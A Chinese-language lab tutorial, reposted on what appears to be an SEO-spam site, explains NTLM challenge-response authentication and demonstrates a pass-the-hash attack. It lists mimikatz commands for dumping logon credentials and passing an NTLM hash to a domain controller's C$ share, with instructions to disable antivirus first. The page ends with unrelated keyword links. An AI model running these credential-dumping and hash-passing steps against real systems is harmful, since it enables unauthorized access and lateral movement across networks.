当前位置: 首页 > news >正文

网页网站建设网站建设加推广优化

网页网站建设,网站建设加推广优化,wordpress 适配 手机,与狗狗做网站概念 早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。 哈希传递前提 同密码(攻击主机与实现主机两台要密码一致)。 NTLM协议 加密ntlm哈希 转换成…

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

哈希传递前提

同密码(攻击主机与实现主机两台要密码一致)。

NTLM协议

加密ntlm哈希

转换成16进制——转换成加密——转换成MD4

image-20231128092813236

NTLM协议:用于远程登录。例如 22

原理

  1. client(win10)将账户名(test)传给server。
  2. 在server中判断本地账户名(test)是否存在,没有就失败,有的话生成challenge(随机生成的),查找user对应的NTLM哈希(在sam里找),使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client(win10)。
  3. client(win10)接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,将response发送给server。
  4. server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。

image-20231128103710255

哈希传递攻击

哈希传递攻击的前提

  • 首先是管理员,必须提前从不同用户变成管理员
  • 需要用户名和ntml哈希值
  • 如果对方主机在域内,就使用域名;如果不在域内,就使用工作组环境的攻击方式

什么情况下会用哈希传递攻击

  • 攻陷一台主机以后,抓不到该主机用户的明文密码
  • 失陷主机和局域网内存在相同密码

哈希传递攻击

工具:mimikatz

环境:域控(server 2008)、客户机(win 7)

网段:在同一网段,都为NAT模式

域控(server)

  • 静态IP:10.1.1.1

在server中查看445是否开放

image-20231128101209454

  • 查看域控C盘

image-20231128200621745

  • 共享C盘(在cmd中输入命令net share

image-20231128204722954

客户端开始攻击(win7)

  • IP:10.1.1.2

  • 关闭杀毒软件

用mimikatz64位工具,必须是system权限

image-20231128201649767

在打开cmd命令解释器必须以管理员身份运行(因为要用到mimikatz工具)

image-20231128201723269

进入mimikatz.exe

image-20231128202127467

攻击利用

  • 提升权限(注:需以管理员权限运行)
privilege::debug

image-20231128203351700

  • 获取内存中保存的登录信息
sekurlsa::logonpasswords 

image-20231128203539731

  • 并抓到自己用户的哈希值(NTLM)

image-20231128203703522

  • 进行哈希攻击
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4  #pth是哈希传递,domain后面跟的是域

image-20231128205345577

  • 同时弹出一个新的cmd窗口

image-20231128205433846

此时哈希值已经准备好,但还未攻击

开始攻击

  • 查看域控(server)C盘
dir \\10.1.1.1\c$

image-20231128205229403

  • 与域控C盘进行对比

image-20231128200621745

  • 攻击成功

总结

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。

http://www.yidumall.com/news/91788.html

相关文章:

  • 公司做网站费会计科目百度推广优化排名怎么收费
  • 中国最大的b2b网站是南宁网络推广品牌
  • 在上海做网站2020年度关键词有哪些
  • wordpress站群管理破解版北京seo排名优化网站
  • 网站权重收录广告推广方案怎么写
  • 网站制作设计正规公司培训机构有哪些
  • 生日祝福网站开发优化大师如何删掉多余的学生
  • 专做sm的网站重庆seo论
  • 网站不进行公安局备案会怎样郑州seo公司排名
  • 成都设计公司怎么选南宁seo服务公司
  • 网站的在线聊天怎么做关键词排名点击软件首页
  • 沈阳网站开发公司深圳seo优化公司搜索引擎优化方案
  • 开网站做私彩赚钱吗百度惠生活商家怎么入驻
  • 网站被挂马怎么办域名查询ip138
  • 做网站的工作是什么宁波网站制作优化服务公司
  • 成都招聘网站制作网站设计培训
  • 常德网站建设网站优化企业网站的域名是该企业的
  • 平湖网站制作微营销软件
  • php可以做网站东莞网站制作外包
  • 登录网站软件怎么做seo营销培训
  • 做网站即墨东莞网络营销销售
  • 网站内页301重定向怎么做磁力搜索引擎torrentkitty
  • 用ih5做微网站站长论坛
  • 企业邮箱域名怎么填写seo优化运营
  • 有pc网站 移动网站怎么做苏州seo推广
  • 东莞网站建设平台谷歌建站
  • 在线免费看影视网站seoul是哪个城市
  • 企业网站建设费用明年2024年有疫情吗
  • 做网站面临的困难免费网站在线观看人数在哪直播
  • 网上做中考题的网站百度首页百度一下